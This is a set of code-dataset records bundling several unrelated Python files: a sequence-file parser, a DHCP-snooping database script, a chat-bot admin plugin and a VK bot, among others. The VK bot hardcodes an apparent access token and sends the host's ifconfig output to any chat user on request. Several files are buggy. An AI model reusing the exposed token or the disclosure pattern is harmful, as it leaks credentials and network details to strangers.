fq1_suffix='_L001_R1_001.fastq.gz',\r\n fq2_suffix='_L001_R2_001.fastq.gz')\r\n self.assertFileExists(f'{self.workdir}/pool_fastqs', fq_dir)\r\n self.assertEqual('.fq', fq_suffix)\r\n\r\n def __test_import_single_end_fastq(self):\r\n actual = ImportSingleEndFastq(self.settings).main(\r\n fq_dir=f'{self.indir}/concat_fastqs',\r\n fq_suffix='.fq')\r\n expected = f'{self.workdir}/single-end-demultiplexed.qza'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_import_paired_end_fastq(self):\r\n actual = ImportPairedEndFastq(self.settings).main(\r\n fq_dir=f'{self.indir}/fq_dir',\r\n fq1_suffix='_L001_R1_001.fastq.gz',\r\n fq2_suffix='_L001_R2_001.fastq.gz')\r\n expected = f'{self.workdir}/paired-end-demultiplexed.qza'\r\n self.assertFileExists(expected, actual)\r\n\r\n def __test_dada2_single_end(self):\r\n Dada2SingleEnd(self.settings).main(\r\n demultiplexed_seq_qza=f'{self.indir}/single-end-demultiplexed.qza'\r\n )\r\n\r\n def __test_dada2_paired_end(self):\r\n Dada2PairedEnd(self.settings).main(\r\n demultiplexed_seq_qza=f'{self.indir}/paired-end-demultiplexed.qza'\r\n )\r\n","sub_path":"test/test_me.py","file_name":"test_me.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"533603637","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 7 15:41:57 2016\n\n@author: lv\n\"\"\"\nimport pprint\n\nprinter = pprint.PrettyPrinter()\n\nraw = \"\"\n\n\ndef parse_fasta(db):\n file_handle = open(\"/home/lv/Documents/WS2016/examples/sequence.fasta\", \"r\")\n \n obj = {}\n for line in file_handle:\n line = line.strip()\n # TIPP: Wenn Sie wie hier nur auf ein Zeichen prüfen, können Sie auch\n # den Indexoperator benutzen. Der ist schneller.\n # if zeile[0] == \">\":\n if line.startswith('>'):\n if obj:\n db.append(obj)\n obj[\"sequence\"]=\"\"\n obj[\"raw\"]=\"\"\n obj[\"id\"], obj[\"description\"] = line.split(\" \", 1)\n obj[\"id\"] = obj[\"id\"][1:]\n else:\n obj[\"sequence\"] += line\n\n # ACHTUNG: line wurde bereits verändert 'line.strip()'\n # und ist nicht mehr raw. Verschieben Sie die Zeile\n # nach ganz oben im Loop\n obj[\"raw\"] += line\n \n\n \ndb = []\nparse_fasta(db)\n#print(db)\n\ndef parse_genBank(dbgen):\n file_handle = open(\"/home/lv/Documents/WS2016/examples/sequence.gb\", \"r\")\n \n obj = {}\n current_field = \"\"\n for line in file_handle:\n line = line.strip()\n if line.startswith('LOCUS'):\n if obj:\n dbgen.append(obj)\n obj = {}\n \n obj[\"raw\"]=\"\"\n \n if line.startswith(\"//\"):\n current_field = \"\"\n \n \n if line.startswith('ORIGIN'):\n obj[\"sequence\"]=\"\"\n current_field=\"ori\"\n elif current_field is \"ori\":\n sequences = line.split()[1:]\n sequence = \"\".join(sequences) \n obj[\"sequence\"] += sequence \n \n if line.startswith('gene') and current_field is not \"note\":\n current_field=\"gene\"\n \n obj[\"features\"] = []\n \n feature = {}\n feature[\"position\"] = line.split(maxsplit=1)[-1]\n \n obj[\"features\"].append(feature)\n\n\n\n elif line.startswith('/gene') and current_field is \"gene\":\n name = line.split(\"=\",maxsplit=1)[-1]\n feature[\"name\"] = name.strip(\"\\\"\")\n \n elif line.startswith('/note') and current_field is \"gene\":\n current_field = \"note\"\n note = line.split(\"=\",maxsplit=1)[-1]\n feature[\"note\"] = note.strip(\"\\\"\")\n \n elif line.startswith('/db_xref') and (current_field is \"note\" or current_field is \"gene\"):\n current_field = \"gene\"\n id = line.split('/db_xref=\"')[-1]\n feature[\"id\"] = id.strip('\"')\n elif current_field is \"note\":\n feature[\"note\"] += line\n \n if line.startswith('ORGANISM'):\n current_field = \"org\"\n obj[\"organism\"] = line.split(maxsplit=1)[-1]\n \n if line.startswith('ACCESSION'):\n current_field = \"acc\"\n obj[\"id\"] = line.split()[-1]\n \n \n if line.startswith('DEFINITION'): \n obj[\"description\"] = line.split(maxsplit=1)[-1]\n current_field = \"def\"\n elif current_field is \"def\":\n obj[\"description\"] += line.strip()\n \ndbgen = []\nparse_genBank(dbgen)\nprinter.pprint(dbgen)\n\n\n#Funktionen:\n\ndef get_raw(db, index):\n \"\"\"reads database and returns field 'raw'\"\"\"\n return db[index]['raw']\n\ndef get_id(db, index):\n \"\"\"reads database and returns field 'id' \"\"\"\n return db[index]['id']\n\ndef get_description(db, index):\n \"\"\"reads database and returns field 'description' \"\"\"\n return db[index]['desc']\n\ndef get_sequence(db, index):\n \"\"\"reads database and returns field 'sequence' \"\"\"\n return db[index]['sequence']\n\ndef get_fasta(db, index, line_length=80):\n \"\"\"reads database and returns fasta file with max. 
80 chars in line\"\"\"\n lines = []\n for i in range(0, (len(db[index]['sequence']) // line_length) * line_length, step=line_length):\n lines.append(db[index]['sequence'][i:i + line_length])\n if len(sequence) % line_length > 0:\n lines.append(sequence[i:])\n\n return \"\\n\".join(lines)\n\ndef get_feature(db, index, feature):\n \"\"\"reads database and returns any field given \"\"\"\n return(db[index][feature])\n\ndef add_feature(db, index, feature, value):\n \"\"\"reads database and adds any given feature into database\"\"\"\n db[index][feature] = value\n return db[index]\n\ndef add_sequence_object(db, id, description, sequence, **features):\n \"\"\"reads database and adds new entry into database\"\"\"\n db.append({\"id\":id, \"desc\":description, \"sequence\":sequence, **features})\n return(db)\n\ndef get_gc_content(db, index):\n \"\"\"reads database and returns GC content of the sequence in % \"\"\"\n seq = db[index][\"sequence\"]\n count = 0\n for ind, char in enumerate(seq):\n if (char == \"A\") or (char == \"T\"):\n continue\n else:\n count +=1\n content = count / (ind+1)\n content *= 100\n return content\n\ndef get_output(db, index, type):\n \"\"\"reads database and returns a desired output in html, markdown or standard\"\"\"\n if type == \"markdown\":\n output = \"# H1\" + db[index][\"id\"] + \"*\" + db[index][\"desc\"] + \"*\" + \"\\n\" + \"```\" + db[index][\"sequence\"] + \"```\"\n elif type == \"html\":\n output = \"\" + db[index][\"id\"] + \"
\" + db[index][\"desc\"] + \"\" + \"
\" + \"\" + db[index][\"sequence\"] + \"\"\n else:\n output = db[index][\"id\"] + db[index][\"desc\"] + db[index][\"sequence\"]\n return output\n","sub_path":"gollobich/Aufgabe 6.py","file_name":"Aufgabe 6.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"464718797","text":"#!/usr/bin/env python\n# coding=utf-8\nimport read_sam_data as rsd\nimport numpy as np\n\nsampled_data_FC=rsd.re_sam_data(FC='FC2')\nFT1_FC=sampled_data_FC[0,1]*(1-0.035)\nFT2_FC=sampled_data_FC[0,1]*(1-0.040)\nFT3_FC=sampled_data_FC[0,1]*(1-0.045)\nFT4_FC=sampled_data_FC[0,1]*(1-0.050)\nFT5_FC=sampled_data_FC[0,1]*(1-0.055)\n\nFT1_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT2_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT3_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT4_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\nFT5_flag=0 # flag bit, 0 means haven't searched the FT1, 1 means already searched the FT1\n\n\nsampled_data_FC=sampled_data_FC[1100:,]\n\nx_old=np.array([[0],[0]])\nfor x in sampled_data_FC:\n if x[1] < FT1_FC and x_old[1] > FT1_FC and FT1_flag==0:\n FT1_value=x\n FT1_flag=1\n if x[1] < FT2_FC and x_old[1] > FT2_FC and FT2_flag==0:\n FT2_value=x\n FT2_flag=1\n if x[1] < FT3_FC and x_old[1] > FT3_FC and FT3_flag==0:\n FT3_value=x\n FT3_flag=1\n if x[1] < FT4_FC and x_old[1] > FT4_FC and FT4_flag==0:\n FT4_value=x\n FT4_flag=1\n if x[1] < FT5_FC and x_old[1] > FT5_FC and FT5_flag==0:\n FT5_value=x\n FT5_flag=1\n x_old=x\n\nprint (FT1_FC)\nprint (FT2_FC)\nprint (FT3_FC)\nprint (FT4_FC)\nprint (FT5_FC)\n\nprint (FT1_value)\nprint (FT2_value)\nprint (FT3_value)\nprint (FT4_value)\nprint (FT5_value)\n\n","sub_path":"RUL_err.py","file_name":"RUL_err.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"84473766","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This file is part of SleekBot. http://github.com/hgrecco/SleekBot\n See the README file for more information.\n\"\"\"\n\nfrom sleekbot.commandbot import botcmd, CommandBot, denymsg\nfrom sleekbot.commandbot import parse_args, ArgError\nfrom sleekbot.plugbot import BotPlugin\n\n\nclass Admin(BotPlugin):\n \"\"\"A plugin to manage the bot.\"\"\"\n\n @botcmd(name='rehash', allow=CommandBot.msg_from_owner)\n @denymsg('No molas lo suficiente como para ejecutar este comando')\n def handle_rehash(self, command, args, msg):\n \"\"\" Reload the bot config and plugins without dropping the XMPP stream.\n \"\"\"\n\n self.bot.rehash()\n return \"Recargado, amo\"\n\n @botcmd(name='restart', allow=CommandBot.msg_from_owner)\n @denymsg('No molas lo suficiente como para ejecutar este comando')\n def handle_restart(self, command, args, msg):\n \"\"\" Restart the bot, reconnecting, etc ...\"\"\"\n\n self.bot.restart()\n return \"Reiniciado, amo\"\n\n @botcmd(name='die', allow=CommandBot.msg_from_owner)\n @denymsg('No molas lo suficiente como para ejecutar este comando')\n def handle_die(self, command, args, msg):\n \"\"\" Kill the bot.\"\"\"\n\n self.bot.die()\n return \"Muriendo... Nunca verás este mensaje\"\n\n @botcmd(name='reload', allow=CommandBot.msg_from_owner)\n def handle_reload(self, command, args, msg):\n \"\"\" Reload the plugins \"\"\"\n\n self.bot.cmd_plugins.reload_all()\n return \"Plugins recargados, amo\"\n\n @botcmd(hidden=True)\n def register(self, command, args, msg):\n \"\"\" Register yourself the first time as a bot owner\n \"\"\"\n if self.bot.acl.count() > 0:\n return\n rolen = getattr(self.bot.acl.ROLE, 'owner')\n self.bot.acl[msg['from'].bare] = rolen\n return \"Ahora eres mi amo.\"\n\n\nclass ACL(BotPlugin):\n \"\"\" A plugin to manage users.\"\"\"\n\n @botcmd(usage='[add|del|see|test] jid rol',\n allow=CommandBot.msg_from_admin)\n def acl(self, command, args, msg):\n \"\"\" Administración de ACLs\n \"\"\"\n try:\n args = parse_args(args, (('action', ('add', 'del', 'see', 'test')),\n ('jid', str), ('role', 'user')))\n except ArgError as ex:\n return ex.msg\n\n return getattr(self, 'acl_' + args.action,)(command, args, msg)\n\n @botcmd(usage='jid rol', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_add(self, command, args, msg):\n \"\"\"Add a jid with a given role\n If the user exists, modify the role.\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ('role', 'user')))\n except ArgError as ex:\n return ex.msg\n\n try:\n rolen = getattr(self.bot.acl.ROLE, args.role)\n except AttributeError as ex:\n return '%s no es un rol válido' % args.role\n\n present = args.jid in self.bot.acl\n self.bot.acl[args.jid] = rolen\n if present:\n return '%s actualizado como %s' % (args.jid, args.role)\n else:\n return '%s añadido como %s' % (args.jid, args.role)\n\n @botcmd(usage='jid', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_del(self, command, args, msg):\n \"\"\"Deletes a jid\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ))\n except ArgError as ex:\n return ex.msg\n\n present = args.jid in self.bot.acl\n if present:\n del self.bot.acl[args.jid]\n return '%s eliminado' % args.jid\n else:\n return '%s no se ha encontrado en la acl' % args.jid\n\n @botcmd(usage='jid', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_see(self, command, args, msg):\n \"\"\"See the role a jid\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ))\n except ArgError as ex:\n return ex.msg\n\n part = 
self.bot.acl.find_part(args.jid)\n if part:\n if part == args.jid:\n return '%s es %s' % \\\n (args.jid, self.bot.acl.ROLE[self.bot.acl[args.jid]])\n else:\n return '%s a traves de %s es %s' % \\\n (args.jid, part, self.bot.acl.ROLE[self.bot.acl[part]])\n else:\n return '%s no se ha encontrado en la acl' % args.jid\n\n @botcmd(usage='jid rol', allow=CommandBot.msg_from_admin, hidden=True)\n def acl_test(self, command, args, msg):\n \"\"\"Test if jid belongs to role\n \"\"\"\n try:\n args = parse_args(args, (('jid', str), ('role', 'user')))\n except ArgError as ex:\n return ex.msg\n try:\n rolen = getattr(self.bot.acl.ROLE, args.role)\n except:\n return '%s no es un rol válido' % args.role\n\n present = args.jid in self.bot.acl\n if present:\n if self.bot.acl.check(args.jid, rolen):\n return '%s es %s' % (args.jid, args.role)\n else:\n return '%s no es %s' % (args.jid, args.role)\n else:\n return '%s no se ha encontrado en la acl' % args.jid\n","sub_path":"sleekbot/plugins/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":5161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"230692731","text":"import vk_api\nimport os\nfrom vk_api.longpoll import VkLongPoll, VkEventType\nimport random\nfrom random import randint\nimport time\nos.system('ifconfig >>io.txt')\ni=open('io.txt')\nIP=i.read()\ndef bot_vk():\n x=128711\n def categories():\n y=716237\n def lol(user_id,message):\n vk.method('messages.send',{'user_id': user_id, 'message': message,'random_id':y})\n token='35a0b1e44117b4857a36a347b3b1c948b260b314bf7edb44494165442202ea6ff5049d5ea3225d8c90199'\n vk=vk_api.VkApi(token=token)\n longpoll=VkLongPoll(vk)\n# lol(event.user_id,'Termux_Cod/Menu/Cotigories\\n\\nвыход - exit\\n\\n')\n for event in longpoll.listen():\n if event.type==VkEventType.MESSAGE_NEW:\n y+=1\n if event.to_me:\n msg=event.text\n id_lol='https://m.vk.com/id'+str(event.user_id)+''\n print(event.user_id,msg,id_lol)\n if msg=='Показ' or msg=='top':\n lol(event.user_id,'Termux_Cod/Menu/Cotigories\\n\\nвыход - exit\\n\\n')\n if msg=='exit' or 'e':\n bot_vk()\n else:\n lol(event.user_id,'не понимаю')\n\n def y(user_id,message):\n \n vk.method('messages.send',{'user_id': user_id, 'message': message,'random_id':x})\n\n token='35a0b1e44117b4857a36a347b3b1c948b260b314bf7edb44494165442202ea6ff5049d5ea3225d8c90199'\n vk=vk_api.VkApi(token=token)\n longpoll=VkLongPoll(vk)\n for event in longpoll.listen():\n if event.type==VkEventType.MESSAGE_NEW:\n x+=1\n if event.to_me:\n r=event.text\n id_lol='https://m.vk.com/id'+str(event.user_id)+''\n print(r,id_lol)\n if r=='ip' or r=='1':\n y(event.user_id,IP)\n#ПРИВЕТСТВИЕ\n if r=='Привет' or r=='привет' or r=='Хай' or r=='хай':\n y(event.user_id,'Привет, я бот Termux Cod.\\n \\nНапиши menu.')\n\n \n#МЕНЮ\n if r=='Menu' or r=='menu' or r=='Меню' or r=='меню' or r=='Termux_Cod/Menu':\n y(event.user_id,'Termux_Cod/Menu\\n\\n1. Категории.\\n2. Правила.\\n3. Информация.\\n4. Помощь администрации.')\n\n#КАТЕГОРИИ\n if r=='1' or r=='Категории' or r=='категории' or r=='Termux_Cod/Menu/Cotigories':\n# categories()\n y(event.user_id,'Жмякай показ')\n categories()\n# if r=='fish' or r=='Fish':\n# y(event.user_id,'лол типо статья о фишинге')\n# if r=='exploit' or r=='Exploit':\n# y(event.user_id,'а это об уязвимостях')\n#ПРАВИЛА\n if r=='2' or r=='Правила' or r=='правила' or r=='Termux_Cod/Menu/Cotigories':\n y(event.user_id,'Termux_Cod/Menu/Rules\\n\\nПравила пока не зарегистрированы.')\n#ИНФОРМАЦИЯ\n if r=='3' or r=='Информация'or r=='информация' or r=='Termux_Cod/Menu/Info':\n y(event.user_id,'Termux_Cod/Menu/Info\\n\\nBot Termux Cod создан для автоматизации сообщества.\\n\\nВесь ресурс подготовлен и изложен для изучения в области IT.\\n\\nЗа ваши провокационные поступки, ответственности не несем!')\n#ПОМОЩЬ АДМИНИСТРАЦИИ\n if r=='4' or r=='Помощь администрации' or r=='помощь администрации' or r=='помощь' or r=='Termux_Cod/Menu/Help_Adm':\n y(event.user_id,'Termux_Cod/Menu/Help_Adm\\n\\nКаждый ваш лайк помогает нам быть лучше.')\n if r=='Проблема' or r=='проблема' or r=='Проблемс' or r=='Ошибка':\n y(event.user_id,'Если есть проблемы то обратитесь в тех.поддержу.\\nhttps://m.vk.com/id437306907\\nhttps://m.vk.com/id596372809')\n if r=='ошибка' or r=='sss':\n p9p()\n \n if r=='Кто я?' or r=='кто я?' 
or r=='Кто я' or r=='кто я':\n if event.user_id==437306907 or event.user_id==596372809:\n y(event.user_id,'Вы администратор группы.')\n else:\n y(event.user_id,'Вы не идентифицированы.')\n\n\n \n if r=='Пока' or r=='пока':\n y(event.user_id,'Да и хуй с тобой\\n\\n(:позже изменю:)')\n if r=='my id':\n y(event.user_id,id_lol)\n\n \n if r=='lol6cod':\n break\nbot_vk()\n","sub_path":"hell.py","file_name":"hell.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"48968440","text":"#!/usr/bin/env python\r\n\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef create_db (db_filename,schema_filename):\t#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\tCreating/opening DB file\r\n\r\n\r\n\tdb_exists = os.path.exists(db_filename)\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tcursor = conn.cursor()\r\n\r\n\tif not db_exists:\r\n\t\tprint('Creating schema...')\r\n\t\twith open(schema_filename, 'r') as f:\r\n\t\t\tschema = f.read()\r\n\t\tconn.executescript(schema)\r\n\t\tprint('Done')\r\n\telse:\r\n\t\tprint('Database exists, assume dhcp table does, too.')\r\n\t\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef add_data_switches(db_filename, yamlInputData):\t\t\t#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\tRead switches info from yaml; add info to DB\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tcursor = conn.cursor()\r\n\r\n\twith open(yamlInputData) as file:\r\n\t\tdictSwitchData = yaml.load(file)\r\n\tlistSwitchData = []\r\n\r\n\tfor switchdata in dictSwitchData.values():\r\n\t\tfor hostname,address in switchdata.items():\r\n\t\t\ttupleSwitchItem = (hostname,address)\r\n\t\t\tlistSwitchData.append(tupleSwitchItem)\r\n\r\n\tquery = \"replace into switches values (?, ?)\"\r\n\r\n\tcursor.executemany(query, listSwitchData)\r\n\tconn.commit()\r\n\r\n\tconn.close()\r\n\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef add_data(db_filename,dhcp_snooping_files):\t\t\t\t\t\t#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\tRead DHCP info from show ip dhcp outputs; add info to DB\r\n\r\n\tdhcp_snooping_list = []\r\n\t\r\n\twith open(dhcp_snooping_files, 'r') as file:\r\n\t\tfor strLine in file:\r\n\t\t\tdhcp_snooping_list.append(strLine.rstrip())\r\n\t\r\n\t\r\n\tlistResult = []\r\n\r\n\tfor strFileName in dhcp_snooping_list:\r\n\t\tstrHostname = re.search(regHostname,strFileName).group(1)\r\n\t\twith open(strFileName) as data:\r\n\t\t\tfor line in data:\r\n\t\t\t\tmatch = regex.search(line)\r\n\t\t\t\tif match:\r\n\t\t\t\t\tlistTempResult = list(match.groups())\r\n\t\t\t\t\tlistTempResult.append(strHostname)\r\n\t\t\t\t\tlistTempResult.append('1')\r\n\t\t\t\t\tlistTempResult.append(now)\t\r\n\t\t\t\t\tlistResult.append(tuple(listTempResult))\r\n\r\n\r\n\tprint('Inserting DHCP Snooping data')\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tcursor = conn.cursor()\r\n\r\n\tcursor.execute(\"update dhcp set active = 0\")\r\n\r\n\tfor row in listResult:\r\n\t\ttry:\r\n\t\t\t#print(row[0])\r\n\t\t\tquery = '''replace into dhcp (mac, ip, vlan, interface, switch, active, last_active)\r\n\t\t\t\t\t\tvalues (?, ?, ?, ?, ?, ?, ?)'''\r\n\t\t\tcursor.execute(query, row)\r\n\t\texcept sqlite3.IntegrityError as e:\r\n\t\t\tprint('Error occured: ', e)\r\n\r\n\r\n\titerResult = cursor.execute(\"select * from dhcp where active = 0\")\r\n\r\n\tlistLateDates = []\r\n\r\n\tfor row in iterResult:\r\n\t\t#print(row[6])\r\n\t\tif week_ago > datetime.strptime(row[6], '%Y-%m-%d %H:%M:%S'):\r\n\t\t\tlistLateDates.append(row[6])\r\n\r\n\tfor row in listLateDates:\r\n\t\titerResult = cursor.execute(\"select * from dhcp where active = 0\")\r\n\t\tcursor.execute(\"delete from dhcp where last_active = ?\",(row,))\r\n\t\t\r\n\tconn.commit()\r\n\r\n\tconn.close()\r\n\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\ndef get_data(key,value,db_filename):\r\n\r\n\t\r\n\tkeys = ['mac', 'ip', 'vlan', 'interface' , 'switch', 
'active', 'last_active']\r\n\t\r\n\tif key in keys:\r\n\t\tkeys.remove(key)\r\n\telse:\r\n\t\tprint('Данный параметр не поддерживается.')\r\n\t\tprint('Допустимые значения параметров: mac, ip, vlan, interface, switch, active, last_active')\r\n\t\treturn\r\n\t\t\r\n\tconn = sqlite3.connect(db_filename)\r\n\r\n\t#Позволяет далее обращаться к данным в колонках, по имени колонки\r\n\tconn.row_factory = sqlite3.Row\r\n\r\n\tprint('\\nDetailed information for host(s) with', key, '=', value)\r\n\tprint('-' * 60)\r\n\r\n\r\n\tquery_active = 'select * from dhcp where {} = ? and active = 1'.format(key)\r\n\tquery_inactive = 'select * from dhcp where {} = ? and active = 0'.format(key)\r\n\t\r\n\tresult_active = conn.execute(query_active, (value, ))\r\n\tresult_inactive = conn.execute(query_inactive, (value, ))\r\n\r\n\tprint('Active Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_active:\r\n\t\tfor k in keys:\r\n\t\t\tprint('{:12}: {}'.format(k, row[k]))\r\n\t\tprint('-' * 60)\r\n\r\n\r\n\tprint('Inactive Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_inactive:\r\n\t\tfor k in keys:\r\n\t\t\tprint('{:12}: {}'.format(k, row[k]))\r\n\t\tprint('-' * 60)\r\n\t\t\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n \r\ndef get_all_data(db_filename):\r\n\r\n\tconn = sqlite3.connect(db_filename)\r\n\tprint('\\nВ таблице dhcp такие записи:')\r\n\tprint('-' * 60)\r\n\t\r\n\tquery_active = 'select * from dhcp where active = 1'\r\n\tquery_inactive = 'select * from dhcp where active = 0'\r\n\t\r\n\tresult_active = conn.execute(query_active).fetchall()\r\n\tresult_inactive = conn.execute(query_inactive).fetchall()\r\n\t\r\n\tprint('Active Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_active:\r\n\t\tmac, ip, vlan, interface, switch, active, last_active = row\r\n\t\tprint ('{:18} {:16} {:6} {:16} {:6} {:3}'.format(mac, ip, vlan, interface, switch, active, last_active))\r\n\r\n\tprint('Inactive Values:')\r\n\tprint('-' * 60)\r\n\tfor row in result_inactive:\r\n\t\tmac, ip, vlan, interface, switch, active = row\r\n\t\tprint ('{:18} {:16} {:6} {:16} {:6} {:3}'.format(mac, ip, vlan, interface, switch, active, last_active))\r\n\t\t\r\n\tprint()\t\r\n\t\r\nreturn\r\n\r\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n\r\n\r\n","sub_path":"Natenka Tasks/parse_dhcp_snooping_functions.py","file_name":"parse_dhcp_snooping_functions.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
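# The script above leans on two sqlite3 idioms: "replace into" as an upsert keyed on
# the primary key, and sqlite3.Row for reading columns by name. A minimal in-memory
# demonstration with a toy schema (not the script's full dhcp table):

import sqlite3

conn = sqlite3.connect(":memory:")
conn.row_factory = sqlite3.Row
conn.execute("create table dhcp (mac text primary key, ip text, active integer)")
conn.execute("replace into dhcp values ('aa:bb:cc', '10.0.0.1', 1)")
conn.execute("replace into dhcp values ('aa:bb:cc', '10.0.0.2', 1)")  # replaces the row
row = conn.execute("select * from dhcp").fetchone()
print(row["mac"], row["ip"])  # aa:bb:cc 10.0.0.2
conn.close()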
+{"seq_id":"503382375","text":"from datetime import datetime, time\nfrom icalendar import Event\nfrom django_kronos.settings import DEFAULT_TIMEZONE\n\n\ndef period_to_event(period, dt):\n '''\n convert period object to ical event\n '''\n event = Event()\n event.add('summary', period.index.course.course_code + ' ' + period.period_type + ' ' + period.group)\n start_hour = int(period.start_time)\n start_minute = int((period.start_time - start_hour) * 60)\n event.add('dtstart', datetime.combine(dt, time(start_hour, start_minute, tzinfo=DEFAULT_TIMEZONE)))\n end_hour = int(period.end_time)\n end_minute = int((period.end_time - end_hour) * 60)\n event.add('dtend', datetime.combine(dt, time(end_hour, end_minute, tzinfo=DEFAULT_TIMEZONE)))\n event.add('location', period.venue)\n return event\n\n","sub_path":"kronos/calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"366330242","text":"#------------------------------------------------------------------------------\n\"\"\"\n\nUSB Device\n\nA generic class for reading/writing USB devices.\n\n\"\"\"\n#------------------------------------------------------------------------------\n\nimport usb.core\nfrom array import array as Array\nfrom usbtools.usbtools import UsbTools\n\n#------------------------------------------------------------------------------\n\ndef find(vps, sn = None):\n \"\"\"lookup a usb device based on vid, pid and serial number\"\"\"\n devices = UsbTools.find_all(vps)\n # do we have any devices?\n if len(devices) == 0:\n return None, 'no device found'\n if sn is not None:\n # filter using the serial number\n devices_sn = [d for d in devices if d[2] == sn]\n if len(devices_sn) == 0:\n # we have devices, but none with this serial number\n s = []\n s.append('no device with this serial number')\n s.append('devices found:')\n for d in devices:\n s.append('%04x:%04x sn %r' % (d[0], d[1], d[2]))\n return None, '\\n'.join(s)\n else:\n devices = devices_sn\n # no devices\n if len(devices) == 0:\n return None, 'no device found'\n # multiple devices\n if len(devices) > 1:\n s = []\n s.append('multiple devices found:')\n for d in devices:\n s.append('%04x:%04x sn %r' % (d[0], d[1], d[2]))\n return None, '\\n'.join(s)\n # 1 device\n return devices[0], None\n\n#------------------------------------------------------------------------------\n\nclass usbdev_error(IOError):\n \"\"\"communication error with the USB device\"\"\"\n\nclass usbdev(object):\n \"\"\"generic USB device driver with read/write interface\"\"\"\n\n def __init__(self):\n self.usb_dev = None\n self.usb_rd_timeout = 5000\n self.usb_wr_timeout = 5000\n self.rdbuf = Array('B')\n self.rdofs = 0\n self.rdbuf_chunksize = 4 << 10\n self.wrbuf_chunksize = 4 << 10\n self.ep_in = None\n self.ep_out = None\n self._wrap_api()\n\n # public functions\n\n def open(self, vid, pid, itf=0, idx=0, sn=None, descr=None):\n \"\"\"open a new interface to the specified device\"\"\"\n self.usb_dev = UsbTools.get_device(vid, pid, idx, sn, descr)\n cfg = self.usb_dev.get_active_configuration()\n # check for a valid interface\n if itf >= cfg.bNumInterfaces:\n raise usbdev_error('invalid interface: %d' % itf)\n self._set_interface(cfg, itf)\n\n def close(self):\n \"\"\"close the interface\"\"\"\n UsbTools.release_device(self.usb_dev)\n\n def write_data(self, data):\n \"\"\"write a data buffer to the device\"\"\"\n ofs = 0\n size = len(data)\n try:\n while ofs < size:\n # how many bytes should we write?\n wr_size = self.wrbuf_chunksize\n if wr_size > size - ofs:\n # reduce the write size\n wr_size = size - ofs\n # write the bytes\n n = self._write(data[ofs : ofs + wr_size])\n if n <= 0:\n raise usbdev_error(\"USB bulk write error\")\n ofs += n\n # return the number of bytes written\n return ofs\n except usb.core.USBError as e:\n raise usbdev_error(str(e))\n\n def read_data(self, size, attempts = 1):\n \"\"\"read size bytes of data from the device\"\"\"\n data = Array('B')\n # do we have all of the data in the read buffer?\n if size <= len(self.rdbuf) - self.rdofs:\n data = self.rdbuf[self.rdofs : self.rdofs + size]\n self.rdofs += size\n return data\n # do we have some of the data in the read buffer?\n if len(self.rdbuf) - self.rdofs > 0:\n data = self.rdbuf[self.rdofs:]\n # do a usb read to get the rest...\n # read from the usb device\n try:\n bytes_to_rd = size - len(data)\n while bytes_to_rd > 0:\n # read from the usb device\n while True:\n self.rdbuf = 
